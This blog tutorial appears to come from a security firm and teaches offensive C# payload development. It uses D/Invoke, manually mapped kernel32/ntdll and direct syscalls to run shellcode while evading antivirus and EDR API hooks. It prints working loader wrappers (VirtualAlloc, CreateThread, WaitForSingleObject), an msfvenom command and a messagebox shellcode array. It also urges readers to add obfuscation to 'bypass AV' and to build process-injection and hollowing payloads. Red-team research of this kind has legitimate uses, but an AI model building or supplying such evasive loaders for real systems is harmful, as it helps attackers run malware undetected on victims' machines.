Implementing Dynamic Invocation in C#

By Andrew Peng

This post serves as introduction to payload development, following up on concepts in basic C# payload development such as the usage of Windows APIs, platform invocation (P/Invoke), and how basic Windows APIs tie together to perform shellcode execution. There are many approaches to payload/stager development, with multiple options of language, frameworks, etc.  This post will focus on C#.

First, credit is due to @The Wover and @FuzzySec for the creation of dynamic invocation (D/Invoke) as well as providing a blog post that goes in depth on the fundamentals of D/Invoke. The linked blog post provides an excellent background into the negatives of P/Invoke as a way of using Windows API calls. It states that:

  1. Any reference to a Windows API call made through P/Invoke will result in a corresponding entry in the .NET Assembly’s Import Table. When your .NET Assembly is loaded, its Import Address Table will be updated with the addresses of the functions that you are calling.
  2. If the endpoint security product running on the target machine is monitoring API calls (such as via API Hooking), then any calls made via P/Invoke may be detected by the product.

The blog also includes information on how D/Invoke is integrated with SharpSploit, but doesn’t cover how we can implement it into our own C# payloads. While it also provides a Github repo as an example of integrating D/Invoke, the lack of documentation may make it hard to follow.

In this blog post, we’ll walk through an example of our own, while also looking at the multiple different methods available to us.

Rastamouse Fork


To begin, rather than straight up integrating the original D/Invoke project into our payloads, we can use a fork provided by Rastamouse, which contains only the minimum core DynamicInvoke and ManualMap functionality. This fork omits the default D/Invoke Injection folder as well as several Windows APIs.

We will use and make edits to this fork in this post.

Using this fork, rather than the original project, maintains a lower profile and brings us a step toward evading any sort of detection. To go along with this, Rastamouse has provided a wiki to document API usage with D/Invoke.

Setting Up Our Project


Let’s go ahead and start building the framework for our payload. We’ll begin by creating a new project in Visual Studio, making sure to select Console App (.NET Framework) C#. Because we are building our payload specifically for Windows machines, we don’t need the cross-platform capability that .NET core brings, and instead use .NET Framework because the capabilities align with what we’re trying to accomplish. Additionally, .NET Core is not installed by default, whereas .NET Framework is, so we are much less likely to run into compatibility issues.  Nevertheless, as long as we are using .NET, our application builds as Assemblies, meaning we can tinker with different execution methods and techniques such as reflective loading. A deeper dive into assemblies can be found within the MSDN documentation here: https://docs.microsoft.com/en-us/dotnet/standard/assembly/.

From here, we’ll need to create three folders to house the three different D/Invoke namespaces.

We can name the folders like so:

Now we’ll need to import the C# files into their respective folders. The final result should look something like this:

We can test that the D/Invoke files have been added correctly by attempting to use the GetApiHash method from the Generic class of the DInvoke.DynamicInvoke namespace.

No errors indicates we are all set up and can begin playing around with D/Invoke!

If we do some quick analysis on the D/Invoke library, we find that the DInvoke.DynamicInvoke folder contains the main, core D/Invoke functionality. We can infer and confirm that the Native class contains Windows Native APIs, such as Nt* functions, while the Win32 class contains Win32 APIs. Interestingly, the only Win32 API included in the RastaMouse fork is CloseHandle (CreateRemoteThread, OpenProcess, IsWow64Process for default D/Invoke library). This begs the question: why aren’t common payload development functions like VirtualAlloc, CreateThread, and VirtualProtect included in the D/Invoke library by default?

Using kernel32 Exported APIs


Just because the D/Invoke library and dinvoke.net don’t include functions that we just mentioned such as VirtualAlloc, CreateThread, and VirtualProtect does not mean we can’t use them. In fact, we can create these delegates ourselves since we know the function prototypes and can actually just port them over from the P/Invoke library. You can think of a delegate as a pointer to a function, allowing us to pass methods as arguments to other methods. This is how we can perform dynamic address lookups for relevant Windows APIs and pass the function prototype parameters. This concept, Native interoperability, is required because we are working with unmanaged code (Win32 APIs) from a managed language in C# and .NET. An explanation for this can be found here.

To start, we’ll add our Win32 APIs to the DInvoke.DynamicInvoke.Win32 class. To add an API, we’ll need to create a method and a corresponding delegate. The delegate is essentially the function prototype that we are used to seeing, which we can grab straight from P/Invoke. P/Invoke defines the C# signature of VirtualAlloc as:

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

Git

It stands to assume that we can create a delegate with the exact same arguments.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

Git

We are using the __stdcall calling convention since it is used to call Win32 API functions in C#.

Once we have the delegate set up, we’ll need to create a managed wrapper method that will be called when we want to use the Win32 API.

public static IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect)
{
    object[] funcargs =
    {
        lpAddress, dwSize, flAllocationType, flProtect
    };

    IntPtr retVal = (IntPtr)Generic.DynamicApiInvoke(@"kernel32.dll", @"VirtualAlloc",
        typeof(Delegates.VirtualAlloc), ref funcargs);
        
        return retVal;
}

Git

The Delegates.VirtualAlloc delegate, which is the delegate we created that houses the function prototype for VirtualAlloc, is passed to DInvoke.DynamicInvoke.Generic.DynamicApiInvoke, which performs a dynamic lookup of VirtualAlloc, grabs the pointer to VirtualAlloc, and passes it to DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke, where the function wrapped by the delegate is invoked along with the parameters that were passed.

Here is what our Win32 wrapper class looks like:

If we did everything correctly, we should be able to call VirtualAlloc without any errors like so:

IntPtr addr = DInvoke.DynamicInvoke.Win32.VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x3000, DInvoke.Data.Win32.WinNT.PAGE_EXECUTE_READWRITE);

Git

Nice! We can now replicate the above steps for CreateThread and WaitForSingleObject.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
    IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

Git

And the wrapper methods:

public static IntPtr CreateThread(
    IntPtr lpThreadAttributes,
    uint dwStackSize,
    IntPtr lpStartAddress,
    IntPtr lpParameter,
    uint dwCreationFlags,
    IntPtr lpThreadId)
{
    // Craft an array for the arguments
    object[] funcargs =
    {
        lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId
    };

    IntPtr retVal = (IntPtr)Generic.DynamicApiInvoke(@"kernel32.dll", @"CreateThread",
        typeof(Delegates.CreateThread), ref funcargs);

        return retVal;

}
    
public static UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds)
{
    object[] funcargs =
    {
        hHandle, dwMilliseconds
    };

    UInt32 retVal = (UInt32)Generic.DynamicApiInvoke(@"kernel32.dll", @"WaitForSingleObject",
        typeof(Delegates.WaitForSingleObject), ref funcargs);

    return retVal;
}

Git

We can call the functions like so:

IntPtr hThread = DInvoke.DynamicInvoke.Win32.CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
DInvoke.DynamicInvoke.Win32.WaitForSingleObject(hThread, 0xFFFFFFFF);

Git

To test our code, we can use the Metasploit messagebox payload so we won’t have to stand up a C2 framework for testing purposes.

msfvenom -p windows/x64/messagebox TEXT="Tevora Blog App" -f csharp

Git

Alternatively you can copy this byte array here:

byte[] buf = new byte[294] {0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x0e,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x54,0x65,0x76,0x6f,0x72,0x61,0x20,0x42,0x6c,0x6f,0x67,0x20,0x41,0x70,0x70,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00};

Git

Note that since we’re going through a proof of concept on how to utilize D/Invoke, we’re testing our payload with Defender off and using unobfuscated shellcode. Be sure after this to implement some sort of obfuscation to your payload to bypass AV!

When attempting to build this solution, we may run into architecture errors.

We can change the language version to the latest (10 at the time of this writing) by unloading the project, editing the project file, changing LangVersion to 10.0, and reloading the project.

Unload the Project
Edit Project File
Find the <LangVersion> tag
Change <LangVersion> to 10.0

Reload the Project

Now we can build the solution, and when we execute it, we see message box popping up!

Now that we effectively recreated a basic C# payload, which uses D/Invoke rather than P/Invoke, let us analyze the differences between the two.

In order to compare the differences between P/Invoke and D/Invoke, we need a valid P/invoke call, so we will use P/Invoke to import the VirtualAlloc API and include a call to VirtualAlloc, storing the resulting memory address in the paddr parameter.  Our D/Invoke call will still point to the addr parameter. We’ll also print these addresses to the console so we can perform searches on them.

Now that our payload includes both a P/Invoke and D/Invoke call, we can execute it within API Monitor, a free tool that identifies all API calls made within the process. When configuring API monitor, we want to “hook” kernel32.dll to observe the API calls.

We can to go the API Filter box in the top left, search for kernel32.dll, and check all the categories.

In the Monitored Process window, we can click Monitor New Process and attach our EXE, using the Remote Thread Attach method.

We can see our messagebox has popped, the command prompt output gives us pointers to memory addresses that VirtualAlloc has created, and the Summary window in API monitor has been populated.

We can use the console printed addresses and search for the memory address in the Summary window. Let’s start with the P/Invoke address first.

Keep in mind we are looking for a VirtualAlloc API call with the dwSize set to the size of your buffer (in my case 294) as well as flProtect set to PAGE_EXECUTEREAD_WRITE.

We can see clearly here that API monitor picks up our P/Invoke VirtualAlloc API call.

Let’s perform the same search with the D/Invoke address. After we replace the “Find what” value and keep clicking through “Find next,” we aren’t able to find any VirtualAlloc API call with a size of 294.

This confirms that the usage of D/Invoke aids in bypassing AV and EDR tools that monitor suspicious API calls. Let’s also take a look at the PE headers.

When executables are built and code is compiled, the result is a Portable Executable (PE), which follows the PE file format. The PE format consists of many different structures and headers, but generally follows the same format between each executable. The aforementioned IAT is one such section of the PE format which is used by the Windows loader to locate DLLs and functions and update the executable with the corresponding addresses. This is apparent in native Window’s applications like calc.exe.

However, a .NET executable works a little bit differently. First off, the advantage of using .NET framework and creating .NET executables is usage of the Common Language Runtime (CLR) and access to class libraries included in the framework. In addition, while the compiled .NET executable also follows the PE format, the structures are slightly different. When a .NET program is compiled with a C# compiler, the result is a managed module. A managed module (which is a standard PE file) also contains a CLR header, metadata tables, and IL code. When a .NET program is executed, the Windows loader calls the _CorExeMain function from mscoree.dll, which initializes the CLR, checks the CLR header for the managed entry point, and begins execution. The CLR, once loaded, takes care of execution, looking at the Metadata tables and compiling IL code into native CPU instructions. Because of this, a .NET executable won’t have an IAT.

Going back to native Window’s applications, we can understand that the lack of CLR means the Windows loader must walk through the entire PE format, which includes the data directories containing the IAT.

The following image from MSDN shows how .NET programs with P/Invoke use Metadata to locate exported functions.

Within the .NET metadata, there are 45 tables containing various amounts of information.

The ImplMap table is particularly interesting:

The ImplMap table contains various information about unmanaged functions statically imported via P/Invoke.

https://pan-unit42.github.io/dotnetfile/api_documentation/tables/implmap/

This is where our P/Invoke import can be seen, and is likely to be inspected by EDR upon knowledge that our application is a .NET executable.

Now that we understand the differences between Native and .NET executables with regards to the PE format, let’s analyze and see those differences in realtime. We will use CFF explorer, a PE editor, to take a look at the PE between our .NET executable and a native Windows executable.

First, looking at the native calc.exe application, we can see the Import Directory folder, with the kernel32.dll imported and the relevant Windows APIs below.

Now let’s take a look at our .NET application. We see the lack of an Import Directory folder, but the inclusion of a .NET directory folder containing the various metadata tables. In the ImplMap table, we see the one P/Invoke API that we included in our code. But more importantly, we do not see the D/Invoke APIs here.

While these changes will help attacking several AV/EDR solutions, it might not bypass all types of API hooking, since API hooks placed on kernel32.dll may still detect suspicious use of API calls. To improve our payload, we can look into Manual Mapping.

Manual Mapping


Manual mapping can help us avoid API hooking. We can begin by mapping of fresh copy of kernel32.dll, so that if there are any hooks placed on originally loaded kernel32.dll, we call VirtualAlloc, CreateThread, and WaitForSingleObject from within our manually mapped kernel32.dll.

To do this, we’ll create a PE_MANUAL_MAP object containing the kernel32.dll from disk.

DInvoke.Data.PE.PE_MANUAL_MAP kernel32 = DInvoke.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\kernel32.dll");

Git

D/Invoke offers us a couple of options for manual mapping:

  1. DLLMain
  2. Export
  3. Byte Array (Uses Export)

Let’s try using Export (2).

We can see here that the D/Invoke function here is slightly different, as instead of calling DynamicAPIInvoke (which locates the function pointer to the API through GetLibraryAddress), CallMappedDLLModuleExport uses GetExportAddress (which uses the base address of the manually mapped kernel32.dll).

In the Native class of the main DInvoke.DynamicInvoke namespace, we see comments about how the Delegates structure must be public so they may be used with DynamicFunctionInvoke. Since that is exactly what we will be using, we must change the Delegates structure in our Win32 class to be Public.

Before we call the CallMappedDLLModuleExport function we’ll need to create an object array for the parameters we want to pass to DynamicFunctionInvoke. We can take advantage of the built in structures that are included in the D/Invoke library.

object[] VAparameters =
{
    IntPtr.Zero,
    (uint) buf.Length,
    DInvoke.Data.Win32.Kernel32.MEM_COMMIT,
    DInvoke.Data.Win32.WinNT.PAGE_EXECUTE_READWRITE
};

Git

CallMappedDLLModuleExport returns an object, so we’ll need to cast it to an IntPtr (the VirtualAlloc expected return type).

IntPtr addr = (IntPtr)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(kernel32.PEINFO, kernel32.ModuleBase, "VirtualAlloc", typeof(DInvoke.DynamicInvoke.Win32.Delegates.VirtualAlloc), VAparameters);

Git

From here, we can comment out our original VirtualAlloc call, build and run our payload, and pop a messagebox.

We should be able to follow the same process for CreateThread and WaitForSingleObject. Make sure you call Marshal.Copy before executing CreateThread otherwise you’re not going to be executing anything!

Nt* Functions


Let’s take a step back and replace our D/Invoke VirtualAlloc call with P/Invoke and see what happens in API Monitor. I can simply comment out my D/Invoke call, import P/Invoke’s VirtualAlloc, and replace the addr variable with a VirtualAlloc call.

Once it’s replaced, we can compile it. In API Monitor, we were previously only monitoring kernel32.dll. Let’s also monitor ntdll.dll this time by searching for it in the API filter and checking all the categories under ntdll.dll.

Now when we execute our test payload in API Monitor, we can once again search for the the VirtualAlloc call with a size of our payload and PAGE_EXECUTE_READWRITE permissions.

Now that we’re Monitoring kernel32.dll and ntdll.dll exported APIs, we see something interesting here.

This VirtualAlloc call is the one from our payload, has a dwSize of 294, and has PAGE_EXECUTE_READWRITE permissions. We also see an underlying ntdll.dll call, NtAllocateVirtualMemory.

We can look into the parameters of NtAllocateVirtualMemory to confirm this is a result of our VirtualAlloc code.

A little sidebar here to explain why it works this way. There are 4 different privilege levels, known as rings, that control access to memory and CPU operations. Ring 0 (kernel mode) is most privileged, ring 3 (user mode) is least privileged. A majority of user activity occurs in Ring 3, but applications may cross into Ring 0 when calling variety of APIs (think accessing file system). User applications generally call high-level APIs (kernel32, user32) and those APIs will call low-level APIs (ntdll). Ntdll.dll is considered a “bridge” between user land and kernel land because Nt* functions exported from ntdll.dll are essentially wrappers for system calls (syscall). Syscalls are how a program requests a service from the kernel and are essentially what our code is executing. The following diagram outlines user land and kernel land:

And an Nt* function merely acting as a wrapper for a syscall is shown in this unassembled NtAllocateVirtualMemory call:

In this example, the syscall number (18h) is pushed to the EAX register (function return value). A syscall is then invoked, requesting the kernel to allocate memory.

Since NtAllocateVirtualMemory is an ntdll.dll function, it stands to assume that manually mapping kernel32.dll may bypass any EDR using kernel32.dll API hooks. But if an EDR hooks ntdll.dll (which is extremely common and considered the norm nowadays), even if our VirtualAlloc call may be undetected, we will still get caught by the underlying NtAllocateVirtualMemory call. Since we’re not actually programming this call ourselves manually in the payload, even if we were to manually map ntdll.dll into our payload, there’s no way for us to control this API call.

We can see this concept come to fruition even if we were replace this P/Invoke call with our manually mapped VirtualAlloc call. For this, we can use Frida. Frida is a Python module that allows us to hook many common runtimes including .NET and allows us to customize how we want to interpret function arguments and return values in JavaScript. To install it on our Windows development box, just ensure Python is installed.

pip install frida-tools

Git

You may need to add Python to your PATH, in which afterwards, you may invoke Frida like so:

frida-trace

Git

To let Frida hook into our application, we’ll add a couple lines of code that outputs the process ID (which must be passed to Frida) as well as a simple pause in our application, that resumes upon user input.

We’ll add this to the beginning of the Main() method.

From here, we can compile the application and run it, taking note of the process ID. In another command prompt, we can pass the process ID to Frida, and tell it to hook ntdll.dll and monitor any NtAllocateVirtualMemory API calls.

We can see a JavaScript handler file created for NtAllocateVirtualMemory, which by default, does not give us all the information we need. At this point, we can browse to that JS file and edit it like so:

When the application is about to call NtAllocateVirtualMemory, Frida calls the onEnter function, which will store the value for the arguments of NtAllocateVirtualMemory. When returning from the call, the onLeave function is executed, which will log the respective values stored during the API call.

Note that the function prototype of NtAllocateVirtualMemory is slightly different than VirtualAlloc, with the RegionSize parameter to be a pointer to a variable that stores the size, rather than the actual size itself. For this reason, we add the RegionValue variable, that reads the value in the pointer variable stored by RegionSize . Since there are numerous NtAllocateVirtualMemory calls, this will aid in identifying if our malicious call is detected. To further help identification, we’ve added a comparison between the RegionValue and a hard-coded value of the hexadecimal representation of the length of our byte array, which will output three DETECTED’s if matched.

Frida hooks are updated as soon as the handler files are saved, so we can press any key in our payload to continue. Since there’s a lot of output, it’d probably be easier to copy the output and paste it all in a text editor.

Now that we know that Nt* functions will be called, as well as the abundance of EDR’s that hook ntdll.dll rather than kernel32.dll, we can turn to RastaMouse’s dinvoke.net to assist us. Dinvoke.net provides us examples of how to use APIs with generic D/Invoke and syscalls (which we will use later), but not with manually mapping. Still these examples can help us build out our payload.

We’ll first reuse the MapModuleToMemory method to map a fresh copy of ntdll.dll. We’ll declare a uint variable status and set it to 1. This status variable equates to the NTSTATUS result of an API call, with a value of 0 equal to success.

Next, we declare an addr variable, which will be a pointer to our allocated memory.

From here, we’ll create the parameters for and call NtAllocateVirtualMemory, which is very similar to VirtualAlloc with the addition of specifying a process handle.

The documentation states that the NtCurrentProcess macro should be used, which can’t be accessed in C#. NtCurrentProcess and ZwCurrentProcess, which are essentially the same, returns a handle to the current process.

If we take a look at the GetCurrentProcess function documentation, it “retrieves a pseudo handle for the current process… A pseudo handle is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.” It stands to reason that we can pass this value as an IntPtr as a parameter for NtAllocateVirtualMemory. In fact, we can see that D/Invoke already uses this concept.

Another difference between VirtualAlloc and NtAllocateVirtualMemory is the output and return type. Kernel32.dll exported APIs will usually have their own return type. However, most Nt* APIs will have the NTSTATUS return type. With VirtualAlloc, the pointer to the newly allocated memory is the default API return, stored as addr. But for NtAllocateVirtualMemory, the return type is NTSTATUS, and the newly allocated memory address pointer is actually set to the baseAddress parameter. So in order to grab the memory address value, we will set the addr variable to the baseAddress parameter by accessing the second index of the parameter object array.

We can then use the same Marshal.Copy method to copy our buffer to the newly created memory address. We can use Marshal.Copy here since we are within a single process. On the flip side, if we were attempting to build an injection payload such as DLL injection, process injection, or process hollowing, we would need to use NtWriteVirtualMemory instead.

We then follow a similar process for using NtCreateThreadEx. To do so, we’ll just pass the current process handle value as the fourth parameter of NtCreateThreadEx. Just like our NtAllocateVirtualMemory call, we’ll need to grab the handle to the thread we created (tHandle).

To keep our shellcode alive, we will use NtWaitForSingleObject, which isn’t included in D/Invoke since the default library is focused on process injection techniques, where existing processes won’t terminate after the shellcode is run. Similar to what we’ve done with Win32 APIs, we can add a NtWaitForSingleObject delegate in the Delegates structure of the DInvoke.DynamicInvoke.Native namespace. Luckily, the function prototype exists on MSDN, so we can easily create our delegate like so.

For the parameters, we can simply supply a handle to the thread (tHandle), and supply IntPtr.Zero as the timeout, as a null value will result in an infinite timeout. Our newly written Nt* function code is shown below:

Syscalls


Lastly, we’ll talk about syscalls. As mentioned previously, Nt* functions are essentially wrapers for syscalls. Since D/Invoke supports syscalls, we can directly call assembly instructions without having to go through any Windows API calls, which will bypass any hooks placed on userland APIs. Dinvoke.net provides a general idea of how to invoke syscalls. The only changes we’ll make here is using the explicit uint type for status. We can simply copy the parameters we used for the Nt* manual map APIs. The very short syscall code is shown here:

Putting It All Together


From the looks of it, syscalls appear to be the preferred method of invoking Windows APIs, and while it may generally be true, D/Invoke syscalls have certain limitations such as not being able to work in WOW64 processes. Of course, having multiple methods at your disposable means you’ll have more flexibility when it comes to dealing with different types of EDR solutions.

I learned a lot about Windows internals as I was writing this, and hopefully you all have learned a lot as well. The examples shown here aren’t the end though, you’ll still need to create obfuscation and encryption of shellcode to bypass static analysis. Consider creating DLL injection, process injection, process hollowing, etc. payloads, adjusting the necessary parameters and using the appropriate APIs (such as using NtWriteVirtualMemory instead of Marshal.Copy). There are also functions within the D/Invoke library that we have not used in our examples to further obfuscate our code. For example, using GetApiHash within the Generic class can help with static analysis, as performing a dumpbin of our application will reveal the static strings of the malicious APIs we used. Another benefit of knowing how to manually setup D/Invoke into your projects is ease of incorporating these techniques into LOLBINS/LOLBAS applications, which can be helpful in bypassing Machine Learning.

References


https://github.com/TheWover/DInvoke

https://thewover.github.io/Dynamic-Invoke/

https://github.com/med0x2e/NoAmci

https://github.com/rasta-mouse/DInvoke/

https://dinvoke.net/

https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions

https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-the-clr-loader-stub/

https://docs.microsoft.com/en-us/windows/win32/debug/pe-format

https://pan-unit42.github.io/dotnetfile/api_documentation/tables/implmap/

Manfred Chang

Read more posts by this author.